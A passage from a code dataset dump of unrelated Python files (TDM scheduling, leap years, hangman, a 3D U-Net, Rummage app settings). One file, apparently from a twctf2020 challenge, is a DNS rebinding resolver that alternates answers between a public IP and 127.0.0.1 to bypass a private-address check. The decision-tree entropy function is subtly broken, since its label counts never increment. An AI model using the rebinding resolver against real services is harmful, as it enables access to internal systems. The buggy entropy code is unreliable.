list(f.readline().split())\n line[0] = int(line[0])\n line[1] = countries.index(line[1])\n line[2:] = [int(l) for l in line[2:]]\n progetti.append([idProg] + line)\n idProg += 1\n tabella = np.asarray(tabella)\n progetti = np.asarray(progetti)\n \n \n # ===================\n # === CALCULATION ===\n # ===================\n output = []\n for p in progetti:\n units_needed = p[3:] # Units needed for project p\n units_allocated = np.zeros(S) # Units allocated to project p\n tempOUT = []\n \n loop = True\n tBackup = tabella.copy()\n count = 0 # number of times looped\n \n while loop and count < LOOPS and tabella.size > 0:\n loop = False\n \n diff = units_needed - units_allocated\n if any(diff > 0):\n indexU = np.argmax(diff)\n \n col = tabella[:, 4+indexU]\n indexMax = np.argmax(col) \n \n tempOUT.append(\"{} {}\".format(int(tabella[indexMax, 0]), int(tabella[indexMax, 1])))\n # Assign the units to the project\n units_allocated += tabella[indexMax, 4:4+S]\n # Decrease the number of packages available for the provider\n tabella[indexMax, 2] -= 1\n \n if tabella[indexMax, 2] == 0: tabella = np.delete(tabella, indexMax, 0)\n if tabella.size == 0: break\n \n # If there is at least one unit not satisfied reloop\n if any(units_allocated < units_needed): \n loop = True\n count += 1\n \n output.append(tempOUT)\n del tempOUT\n \n output = [sorted(o) for o in output]\n print(\"Calc for {} done.\".format(filename))\n \n \n # ==============\n # === OUTPUT ===\n # ==============\n with open(\"out/{}.out\".format(filename), 'w') as f:\n for o1 in output:\n checked = []\n for o2 in o1:\n if o2 not in checked:\n tot = o1.count(o2)\n checked.append(o2)\n f.write(\"{} {} \".format(o2, tot))\n f.write(\"\\n\")\n print(\"End file {} in {}\".format(filename, timer()-start))\n","sub_path":"2018/mainSB_v2.py","file_name":"mainSB_v2.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"384004826","text":"\"\"\"\nFaça um programa que leia um ano qualquer e mostre\nse ele é BISSEXTO\n\"\"\"\n\nfrom datetime import date\n\nano = int(input('Digite o ano a ser avaliado (Digite zero para o atual):\\n'))\n\nif ano == 0:\n ano = date.today().year\n\nif ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:\n print(f'O ano {ano} é bissexto!')\nelse:\n print(f'O ano {ano} NÃO é bissexto!')\n\n\n\n'''checa = ano % 4\nif ano < 100:\n print('Ano bissexto!' if checa == 0 else 'Ano não bissexto.')\nelse:\n if checa != 0:\n print('Ano não bissexto.')\n else:\n if ano % 100 != 0:\n print('Ano bissexto!')\n else:\n if ano % 400 == 0:\n print('Ano bissexto!')\n else:\n print('Ano não bissexto.')'''","sub_path":"Exercicios_resolvidos/10. Condições - ex032 - Ano bissexto.py","file_name":"10. 
Condições - ex032 - Ano bissexto.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"110353511","text":"#Problema: 12279 - Emoogle Balance\n#Autor: FernandoJerezano\n#Fecha: 28-Octubre-2017\nimport string\n\nc = 1\n\nwhile True:\n\tt = int(input())\n\tif t==0:\n\t\tbreak;\n\tval = input().split(\" \")\n\t\n\tm = 0\n\tn = 0\n\t\n\tfor v in val:\n\t\tif int(v)==0:\n\t\t\tm += 1\n\t\telse:\n\t\t\tn += 1\n\t\t\t\n\tprint(\"Case %d:\" % c,n-m)\n\tc += 1\n","sub_path":"12279 - Emoogle Balance.py","file_name":"12279 - Emoogle Balance.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"322360481","text":"from operator import itemgetter, attrgetter\nfrom math import ceil\n\nclass Tdm():\n\n def __init__(self,total_bw):\n self.total_bw = total_bw\n\n def gen_calendar(self, bw, minGraun=1):\n \"\"\"按照端口带宽列表bw和Calendar配置最小粒度minGraun生成Calendar配置表\n\n Arguments:\n bw {[number]} -- 端口带宽列表\n \n Keyword Arguments:\n minGraun {int} -- 端口带宽的最小换算单位 (default: {1})\n \n Returns:\n [int] -- 返回calendar表结果。每个元素代表当前slot选择的端口序号,-1代表当前slot没有选择。\n\n Priniciple:\n 1. 计算每个端口的希望slot间隔;\n 2. 按端口设置interval,记录距下次填充的间隔slot。填充一个slot后,所有端口的interval都减1;\n 3. 当interval<=0后,再次填充该端口\n \"\"\"\n\n\n class TdmCalendarPortAttribute():\n \"\"\"定义内部使用的数据类\n \"\"\"\n\n def __init__(self,id,bw,total_bw,min_granu):\n # 属性\n self.id = id # 端口编号\n self.bw = ceil(bw/min_granu) # 端口带宽\n self.step = total_bw / bw # 端口调度最大间隔。支持step为非整数\n # 状态\n self.start = False # 端口Calendar填表是否开始表示\n self.interval = 0 # 据上次调度的间隔\n # 统计\n self.expect_slot_st = False # Jitter开始标识\n self.expect_slot = 0 # 当前选择期望的被选中slot。start=True后有效\n self.max_jitter = 0 # 最终的最大jitter记录\n \n def is_unstart(self):\n return not self.start\n\n def is_timeout(self):\n return self.start and self.interval <= 0\n\n def selected(self, slot):\n \"\"\"选中该端口,更新内部数据,并返回id\n \"\"\"\n # Reload端口调度间隔。interval初始为0,第一次start从False变为True后,也需要Reload\n self.interval += self.step\n\n # 更新最大等待Jitter值(DFx)。第一次更新时,初始值都为0\n if self.start and self.expect_slot_st:\n self.max_jitter = max( self.max_jitter, ( slot - self.expect_slot ) )\n if not self.step.is_integer():\n self.max_jitter += 1\n self.expect_slot_st = False\n\n # 无论是否已经开始选择,都更新开始表示\n self.start = True\n\n return self.id\n\n def update(self,slot):\n \"\"\"更新当前端口信息。每次Calendar选择都刷新\n \n Arguments:\n slot {int} -- 当前选择时隙\n \"\"\"\n\n \n if self.start == True:\n self.interval -= 1 # 开始选择端口的调度间距都减1\n\n if self.interval <= 0: # 间隔到期,但没有被选中\n self.expect_slot = slot\n self.expect_slot_st = True\n\n\n def shorten(calendar):\n \"\"\"删减重复的表项,缩减表项长度\n \n Arguments:\n calendar {[int]} -- calendar配置表\n \"\"\"\n\n l = len(calendar)\n\n if l == 0 or l % 2 == 1: #长度不对称,无法化简\n return calendar\n\n lsb = calendar[:int(l/2)]\n msb = calendar[int(l/2):]\n\n # 判断对应位置是否完全相同\n is_all_same = all(map(lambda l,m : l==m, lsb, msb))\n\n if is_all_same:\n return shorten(lsb) # 完全相同,化简后继续迭代化简\n else: # 不完全相同,无法化简\n return calendar\n\n\n rst = []\n\n # 创建端口属性\n # bw = map(lambda b,i: TdmCalendarPortAttribute(i,b,self.total_bw,minGraun), bw, range(len(bw)))\n bw = [TdmCalendarPortAttribute(i, bw[i], self.total_bw, minGraun) for i in range(len(bw))]\n # 按端口带宽从大到小排序\n bw = sorted(bw, key=attrgetter('bw'), reverse=True)\n\n # 循环填充Calendar格子\n for slot in range(ceil(self.total_bw / minGraun)):\n # 在开始填充的端口中查找填充间隔到期(interval<=0)的端口\n expect_port_it = filter(lambda port: port.is_timeout(), 
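The leap-year exercise above encodes the divisible-by-4/100/400 rule by hand; the standard library's calendar.isleap implements exactly that rule. A one-liner sketch:

import calendar
from datetime import date

year = date.today().year
print(year, "is a leap year" if calendar.isleap(year) else "is not a leap year")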
bw)\n\n try:\n expect_port = next(expect_port_it) # 使用简单的大端口优先(SP)方式在间隔都到达的端口之间选择\n rst.append(expect_port.selected(slot)) # 填充当前格子\n\n except StopIteration: # 没有到期的端口\n # 查找是否还有没有开始填充的端口\n unstart_port_it = filter(lambda port : port.is_unstart(), bw)\n\n try:\n # 按带宽从大到小开始填充\n expect_port = next(unstart_port_it)\n rst.append(expect_port.selected(slot))\n except StopIteration:\n rst.append(-1) # 当前时隙没有端口选择\n\n # 更新端口间隔\n for port in bw:\n port.update(slot)\n \n return shorten(rst) #返回最终的Calendar表\n \n# Test\ntdm = Tdm(800)\n\nprint( tdm.gen_calendar([100,100], 100) )\n# [0, 1, -1, -1, -1, -1, -1, -1]\n\nprint( tdm.gen_calendar([100,100,100], 50) ) \n# [0, 1, 2, -1, -1, -1, -1, -1]\n\nprint( tdm.gen_calendar([50,100,200,400], 50) ) \n# [3, 2, 3, 1, 3, 2, 3, 0, 3, 2, 3, 1, 3, 2, 3, -1]\n\nprint( tdm.gen_calendar([35], 5) ) ","sub_path":"bwMgr/python/tdm.py","file_name":"tdm.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"538658494","text":"\r\nclass Controller:\r\n def __init__(self, model):\r\n self.model = model\r\n\r\n def guess(self, character):\r\n # change uppercase to lowercase\r\n character.lower()\r\n\r\n # User Input Error\r\n if len(character) == 0:\r\n return \"Input one alphabet!\"\r\n\r\n if not character.isalpha():\r\n return \"Input only alphabet!\"\r\n\r\n if character in self.model.getGuessedChars():\r\n return \"Already use!\"\r\n\r\n # append character to guessedChars\r\n if character not in self.model.getGuessedChars():\r\n self.model.guessedChars.append(character)\r\n\r\n # User Wrong\r\n if character not in self.model.getAnswer():\r\n self.model.increaseTries()\r\n self.model.decreaseLife()\r\n return False\r\n #User Right\r\n # Update currentStatus\r\n else:\r\n self.model.updateStatus(character)\r\n return True\r\n","sub_path":"gui_controller.py","file_name":"gui_controller.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"552772362","text":"from PyQt5 import QtWidgets\n\n\nclass ClssDialog(QtWidgets.QDialog):\n def __init__(self, parent=None, text_error=\"\"):\n super(ClssDialog, self).__init__(parent)\n\n self.verticalLayout = QtWidgets.QVBoxLayout(self)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.label_text = QtWidgets.QLabel(self)\n self.label_text.setObjectName(\"label_text\")\n self.verticalLayout.addWidget(self.label_text)\n self.pushButton = QtWidgets.QPushButton(self)\n self.pushButton.setObjectName(\"pushButton\")\n self.pushButton.clicked.connect(self.btnClosed)\n self.verticalLayout.addWidget(self.pushButton)\n self.setWindowTitle(\"Сообщение об ошибке\")\n self.pushButton.setText(\"ОК\")\n self.label_text.setText(text_error)\n\n def btnClosed(self):\n self.close()\n","sub_path":"ErrorWindow.py","file_name":"ErrorWindow.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"611413431","text":"from twisted.internet import reactor, defer\nfrom twisted.names import client, dns, error, server\n\n\n\nclass DynamicResolver(object):\n resolve_cnt = 0\n def _doDynamicResponse(self, query):\n \"\"\"\n Calculate the response to a query.\n \"\"\"\n if self.resolve_cnt % 2 == 0:\n answer = dns.RRHeader(name=query.name.name,\n payload=dns.Record_A(address=b'93.184.216.34'),\n ttl=0)\n answers = [answer]\n authority = []\n additional = []\n else:\n answer = 
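Tdm.gen_calendar above ends by calling shorten, which halves the table while the two halves match slot-for-slot. That helper stands alone; a sketch of just the recursion, comparing the halves with == instead of the original map/all pair:

def shorten(calendar):
    # Drop the duplicated half while the two halves are identical.
    n = len(calendar)
    if n == 0 or n % 2 == 1:
        return calendar
    lsb, msb = calendar[:n // 2], calendar[n // 2:]
    if lsb == msb:
        return shorten(lsb)
    return calendar

print(shorten([0, 1, 0, 1, 0, 1, 0, 1]))  # [0, 1]
print(shorten([0, 1, 2, -1]))             # unchanged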
dns.RRHeader(name=query.name.name,\n payload=dns.Record_A(address=b'127.0.0.1'),\n ttl=0)\n answers = [answer]\n authority = []\n additional = []\n self.resolve_cnt += 1\n return answers, authority, additional\n\n def query(self, query, timeout=None):\n return defer.succeed(self._doDynamicResponse(query))\n\n\n\ndef main():\n \"\"\"\n Run the server.\n \"\"\"\n factory = server.DNSServerFactory(\n clients=[DynamicResolver(), client.Resolver(resolv='/etc/resolv.conf')]\n )\n\n protocol = dns.DNSDatagramProtocol(controller=factory)\n\n reactor.listenUDP(53, protocol)\n reactor.listenTCP(53, factory)\n\n reactor.run()\n\n\n\nif __name__ == '__main__':\n raise SystemExit(main())\n","sub_path":"twctf2020/urlcheck2/resolver/bypass_private_check_resolver.py","file_name":"bypass_private_check_resolver.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"425613322","text":"import numpy as np\n\nfrom keras.models import Model\nfrom keras.layers import Input, BatchNormalization, Concatenate, PReLU\nfrom keras.layers import Conv3D, MaxPooling3D, Conv3DTranspose\nfrom keras.utils import plot_model\n\n\ndef Encoding(inputs, filters=64, blocks=4):\n outputs = []\n x = inputs\n for index in range(blocks):\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n if index != blocks - 1:\n outputs.append(x)\n x = MaxPooling3D(pool_size=(2, 2, 1))(x)\n\n return x, outputs\n\n\ndef Decoding_Deep_Supervision(inputs_1, inputs_2, filters=64, blocks=4, channel=3):\n x = inputs_1\n output_list = []\n for index in np.arange(blocks - 2, -1, -1):\n x = Conv3DTranspose(filters * np.power(2, index), kernel_size=(2, 2, 1), strides=(2, 2, 1), padding='same')(x)\n x = Concatenate(axis=4)([x, inputs_2[index]])\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n x = Conv3D(filters * np.power(2, index), kernel_size=(3, 3, 3), strides=1, padding='same', kernel_initializer='he_normal')(x)\n x = BatchNormalization()(x)\n x = PReLU()(x)\n\n output = Conv3D(channel, (1, 1, 1), activation='softmax')(x)\n output_list.append(output)\n\n output_list.reverse()\n\n return output_list\n\n\ndef DSUNet(input_shape, filters=64, blocks=4):\n inputs = Input(input_shape)\n\n x1, EncodingList = Encoding(inputs, filters, blocks)\n\n x2 = Decoding_Deep_Supervision(x1, EncodingList, filters, blocks)\n\n model = Model(inputs, x2)\n return model\n\n\nif __name__ == '__main__':\n model = DSUNet(input_shape=(240, 240, 3, 1), filters=64, blocks=4)\n model.summary()\n plot_model(model, to_file=r'C:\\Users\\ZhangYihong\\Desktop\\model.png', show_shapes=True, )\n","sub_path":"MyModel/3DModel.py","file_name":"3DModel.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"572954286","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\n决策树\n\n分类:\n1. 分类树,输出是样本的类标\n2. 回归树,输出是一个实数\n\n优点:\n1. 计算复杂度不高,输出结果易于理解\n2. 对中间值缺失不敏感,可以处理不相关的特征数据\n3. 使用数值型和标称型数据类型\n\n缺点:\n1. 可能会产生过度匹配\n\n决策树的一般流程:\n1. 收集数据\n2. 
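The Encoding helper above doubles the filter count per block and downsamples between blocks. The pattern in isolation, as a hedged sketch; the filter counts, block count, and input shape here are arbitrary demo values:

import numpy as np
from keras.models import Model
from keras.layers import Input, Conv3D, BatchNormalization, PReLU, MaxPooling3D

inputs = Input((32, 32, 3, 1))           # arbitrary demo shape
x = inputs
for index in range(3):                   # three blocks for illustration
    filters = int(16 * 2 ** index)       # 16, 32, 64: doubled per block
    x = Conv3D(filters, (3, 3, 3), padding="same")(x)
    x = BatchNormalization()(x)
    x = PReLU()(x)
    if index != 2:
        x = MaxPooling3D(pool_size=(2, 2, 1))(x)  # downsample in-plane only

Model(inputs, x).summary()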
准备数据,只适用标称数据,因此要将数值离散化处理\n3. 分析数据,构造数完成之后,检查图形是否符合预期\n4. 训练算法,即构造数的数据结构\n5. 测试算法,使用经验数计算错误率\n6. 使用算法\n\"\"\"\nfrom math import log\n\n\ndef cal_shannon_ent(data_set):\n \"\"\"\n 计算香农熵\n H = -sum(p(Xi)log(p(Xi)))\n \"\"\"\n data_set_size = len(data_set)\n label_counts = {}\n for feat_vec in data_set:\n current_label = feat_vec[-1] # 数据字典,其键值为最后一列数值\n if current_label not in label_counts.keys():\n label_counts[current_label] = 0 + 1\n shannon_ent = 0.0\n for key in label_counts:\n prob = float(label_counts[key]) / data_set_size\n shannon_ent -= prob * log(prob, 2)\n return shannon_ent\n\n\ndef main():\n data_set = [[0], [2], [3]]\n ret = cal_shannon_ent(data_set)\n print(ret)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"algorithms/aiAlgorithms/decision_tree/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"173790089","text":"\"\"\"\nLicensed under MIT\nCopyright (c) 2013 Isaac Muse \nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
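cal_shannon_ent above initialises a label's count with "label_counts[current_label] = 0 + 1" and never increments it, so every label tallies as 1; collections.Counter gives the intended distribution. A corrected sketch of H = -sum(p * log2(p)):

from collections import Counter
from math import log

def shannon_entropy(labels):
    # H = -sum(p_i * log2(p_i)) over the label distribution.
    counts = Counter(labels)  # correct tallies, unlike the `= 0 + 1` line above
    n = len(labels)
    return -sum((c / n) * log(c / n, 2) for c in counts.values())

print(shannon_entropy(["yes", "yes", "no", "no"]))  # 1.0 for a 50/50 split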
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nimport codecs\nimport json\nimport sys\nfrom os import mkdir, listdir\nfrom os.path import expanduser, exists, join, getmtime, isdir\nimport traceback\n\nfrom _lib.file_strip.json import sanitize_json\nimport _lib.notify as notify\nimport _lib.localization as localization\nfrom _lib.localization import get as _\n\nfrom _gui.custom_app import debug, debug_struct, error\nfrom _gui.custom_app import init_app_log, set_debug_mode\nfrom _gui.generic_dialogs import *\n\nfrom _icons.rum_ico import rum_64, rum_tray\n\nif sys.platform.startswith('win'):\n _PLATFORM = \"windows\"\nelif sys.platform == \"darwin\":\n _PLATFORM = \"osx\"\nelse:\n _PLATFORM = \"linux\"\n\nSETTINGS_FILE = \"rummage.settings\"\nCACHE_FILE = \"rummage.cache\"\nLOG_FILE = \"rummage.log\"\nFIFO = \"rummage.fifo\"\n\nNOTIFY_STYLES = {\n \"osx\": [\"growl\"],\n \"windows\": [\"native\", \"growl\"],\n \"linux\": [\"native\"]\n}\n\n\nclass Settings(object):\n filename = None\n allow_save = True\n\n @classmethod\n def load_settings(cls):\n \"\"\"\n Load the settings\n \"\"\"\n\n cls.settings_file, cls.cache_file, log = cls.get_settings_files()\n init_app_log(log)\n cls.settings = {}\n cls.cache = {}\n cls.settings_time = None\n cls.cache_time = None\n cls.get_times()\n if cls.settings_file is not None:\n try:\n with codecs.open(cls.settings_file, \"r\", encoding=\"utf-8\") as f:\n cls.settings = json.loads(sanitize_json(f.read(), preserve_lines=True))\n with codecs.open(cls.cache_file, \"r\", encoding=\"utf-8\") as f:\n cls.cache = json.loads(sanitize_json(f.read(), preserve_lines=True))\n except:\n e = traceback.format_exc()\n try:\n errormsg(_(\"Failed to load settings file!\"))\n error(e)\n except:\n print(str(e))\n if cls.get_debug():\n set_debug_mode(True)\n localization.setup('rummage', join(cls.config_folder, \"locale\"), cls.get_language())\n debug_struct(cls.settings)\n debug_struct(cls.cache)\n cls.init_notify(True)\n\n @classmethod\n def get_hide_limit(cls):\n \"\"\"\n Get hide limit setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"hide_limit\", False)\n\n @classmethod\n def set_hide_limit(cls, hide):\n \"\"\"\n Set hide limit setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"hide_limit\"] = hide\n cls.save_settings()\n\n\n @classmethod\n def get_language(cls):\n \"\"\"\n Get locale language\n \"\"\"\n\n cls.reload_settings()\n locale = cls.settings.get(\"locale\", \"en_US\")\n if locale == \"en_US\" and not exists(join(cls.config_folder, \"locale\", \"en_US\")):\n locale = None\n return locale\n\n @classmethod\n def set_language(cls, language):\n \"\"\"\n Set locale language\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"locale\"] = language\n cls.save_settings()\n\n @classmethod\n def get_languages(cls):\n \"\"\"\n Return languages\n \"\"\"\n\n languages = []\n base = join(cls.config_folder, \"locale\")\n if exists(base):\n for file_obj in listdir(base):\n if isdir(join(base, file_obj)):\n languages.append(file_obj)\n if len(languages) == 0 or \"en_US\" not in languages:\n languages.append(\"en_US\")\n languages.sort()\n return languages\n\n @classmethod\n def get_debug(cls):\n \"\"\"\n Get debug level setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"debug\", False)\n\n @classmethod\n def 
set_debug(cls, enable):\n \"\"\"\n Set debug level setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"debug\"] = enable\n set_debug_mode(enable)\n cls.save_settings()\n\n @classmethod\n def get_times(cls):\n \"\"\"\n Get timestamp on files\n \"\"\"\n\n try:\n settings_time = getmtime(cls.settings_file)\n cache_time = getmtime(cls.cache_file)\n cls.settings_time = settings_time\n cls.cache_time = cache_time\n except Exception as e:\n debug(e)\n error(\"Could not get timestamp of file!\")\n pass\n\n @classmethod\n def changed(cls):\n \"\"\"\n Check if settings or cache have changed\n \"\"\"\n\n old_settings = cls.settings_time\n old_cache = cls.cache_time\n cls.get_times()\n try:\n changed = old_settings != cls.settings_time or old_cache != cls.cache_time\n except:\n error(\"Could not compare timestamp of file!\")\n changed = False\n return changed\n\n @classmethod\n def get_settings_files(cls):\n \"\"\"\n Get settings, cache, log, and fifo location\n \"\"\"\n\n if _PLATFORM == \"windows\":\n folder = expanduser(\"~\\\\.rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, '\\\\\\\\.\\\\pipe\\\\rummage')\n cls.config_folder = folder\n elif _PLATFORM == \"osx\":\n folder = expanduser(\"~/Library/Application Support/Rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, FIFO)\n cls.config_folder = folder\n elif _PLATFORM == \"linux\":\n folder = expanduser(\"~/.config/Rummage\")\n if not exists(folder):\n mkdir(folder)\n settings = join(folder, SETTINGS_FILE)\n cache = join(folder, CACHE_FILE)\n log = join(folder, LOG_FILE)\n cls.fifo = join(folder, FIFO)\n cls.config_folder = folder\n try:\n for filename in [settings, cache]:\n if not exists(filename):\n with codecs.open(filename, \"w\", encoding=\"utf-8\") as f:\n f.write(json.dumps({}, sort_keys=True, indent=4, separators=(',', ': ')))\n except Exception:\n pass\n return settings, cache, log\n\n @classmethod\n def get_config_folder(cls):\n \"\"\"\n Return config folder\n \"\"\"\n\n return cls.config_folder\n\n @classmethod\n def get_fifo(cls):\n \"\"\"\n Get fifo pipe\n \"\"\"\n\n return cls.fifo\n\n @classmethod\n def reload_settings(cls):\n \"\"\"\n Check if the settings have changed and reload if needed\n \"\"\"\n\n if cls.changed():\n debug(\"Reloading settings.\")\n settings = None\n cache = None\n if cls.settings_file is not None:\n try:\n with codecs.open(cls.settings_file, \"r\", encoding=\"utf-8\") as f:\n settings = json.loads(sanitize_json(f.read(), preserve_lines=True))\n with codecs.open(cls.cache_file, \"r\", encoding=\"utf-8\") as f:\n cache = json.loads(sanitize_json(f.read(), preserve_lines=True))\n except Exception:\n pass\n if settings is not None:\n cls.settings = settings\n if cache is not None:\n cls.cache = cache\n\n @classmethod\n def get_editor(cls, filename=\"{$file}\", line=\"{$line}\", col=\"{$col}\"):\n \"\"\"\n Get editor command and replace file, line, and col symbols\n \"\"\"\n\n cls.reload_settings()\n editor = cls.settings.get(\"editor\", [])\n if isinstance(editor, dict):\n editor = editor.get(_PLATFORM, [])\n\n return [arg.replace(\"{$file}\", filename).replace(\"{$line}\", str(line)).replace(\"{$col}\", str(col)) for arg in editor]\n\n @classmethod\n def set_editor(cls, editor):\n \"\"\"\n Set editor command\n \"\"\"\n\n 
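Settings.reload_settings above re-reads both JSON files only when changed() sees a newer mtime. The check-mtime-then-reload idea in miniature; the class name and file shape below are placeholders, not Rummage's real API:

import json
import os
import tempfile
from os.path import getmtime

class CachedConfig(object):
    def __init__(self, path):
        self.path = path
        self.mtime = None
        self.data = {}

    def get(self, key, default=None):
        mtime = getmtime(self.path)
        if mtime != self.mtime:  # file changed on disk -> reload
            with open(self.path, "r") as f:
                self.data = json.load(f)
            self.mtime = mtime
        return self.data.get(key, default)

fd, path = tempfile.mkstemp(suffix=".json")
with os.fdopen(fd, "w") as f:
    json.dump({"debug": True}, f)
cfg = CachedConfig(path)
print(cfg.get("debug"))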
cls.reload_settings()\n cls.settings[\"editor\"] = editor\n cls.save_settings()\n\n @classmethod\n def get_single_instance(cls):\n \"\"\"\n Get single instance setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"single_instance\", False)\n\n @classmethod\n def set_single_instance(cls, single):\n \"\"\"\n Set single instance setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"single_instance\"] = single\n cls.save_settings()\n\n @classmethod\n def add_search(cls, name, search, is_regex):\n \"\"\"\n Add saved search\n \"\"\"\n\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n searches.append((name, search, is_regex))\n cls.settings[\"saved_searches\"] = searches\n cls.save_settings()\n\n @classmethod\n def get_search(cls, idx=None):\n \"\"\"\n Get saved searches or search at index if given\n \"\"\"\n\n value = None\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n if idx is None:\n value = searches\n elif idx < len(searches):\n value = searches[idx]\n return value\n\n @classmethod\n def delete_search(cls, idx):\n \"\"\"\n Delete the search at given index\n \"\"\"\n\n cls.reload_settings()\n searches = cls.settings.get(\"saved_searches\", [])\n if idx < len(searches):\n del searches[idx]\n cls.settings[\"saved_searches\"] = searches\n cls.save_settings()\n\n @classmethod\n def get_alert(cls):\n \"\"\"\n Get alert setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"alert_enabled\", True)\n\n @classmethod\n def set_alert(cls, enable):\n \"\"\"\n Set alert setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"alert_enabled\"] = enable\n cls.save_settings()\n\n @classmethod\n def init_notify(cls, first_time=False):\n \"\"\"\n Setup growl notification\n \"\"\"\n\n # Set up notifications\n if first_time:\n notify.setup_notifications(\"Rummage\", rum_64.GetData(), rum_tray.GetData(), cls.get_config_folder())\n notify.enable_growl(cls.get_notify_method() == \"growl\" and notify.has_growl())\n\n @classmethod\n def get_notify(cls):\n \"\"\"\n Get notification setting\n \"\"\"\n\n cls.reload_settings()\n return cls.settings.get(\"notify_enabled\", True)\n\n @classmethod\n def set_notify(cls, enable):\n \"\"\"\n Set notification setting\n \"\"\"\n\n cls.reload_settings()\n cls.settings[\"notify_enabled\"] = enable\n cls.save_settings()\n\n @classmethod\n def get_platform_notify(cls):\n \"\"\"\n Get all possible platform notification styles\n \"\"\"\n\n return NOTIFY_STYLES[_PLATFORM]\n\n @classmethod\n def get_notify_method(cls):\n \"\"\"\n Get notification style\n \"\"\"\n\n cls.reload_settings()\n method = cls.settings.get(\"notify_method\", NOTIFY_STYLES[_PLATFORM][0])\n if method is None or method == \"wxpython\" or method not in NOTIFY_STYLES[_PLATFORM]:\n method = NOTIFY_STYLES[_PLATFORM][0]\n return method\n\n @classmethod\n def set_notify_method(cls, notify_method):\n \"\"\"\n Set notification style\n \"\"\"\n\n if notify_method not in [\"native\", \"default\", \"growl\"]:\n notify_method = NOTIFY_STYLES[_PLATFORM][0]\n if notify_method in [\"default\", \"native\"]:\n notify_method = \"wxpython\"\n cls.reload_settings()\n cls.settings[\"notify_method\"] = notify_method\n cls.save_settings()\n cls.init_notify()\n\n @classmethod\n def get_search_setting(cls, key, default):\n \"\"\"\n Get search history setting from cache\n \"\"\"\n\n cls.reload_settings()\n return cls.cache.get(key, default)\n\n @classmethod\n def add_search_settings(cls, history, toggles, strings):\n \"\"\"\n Add search 
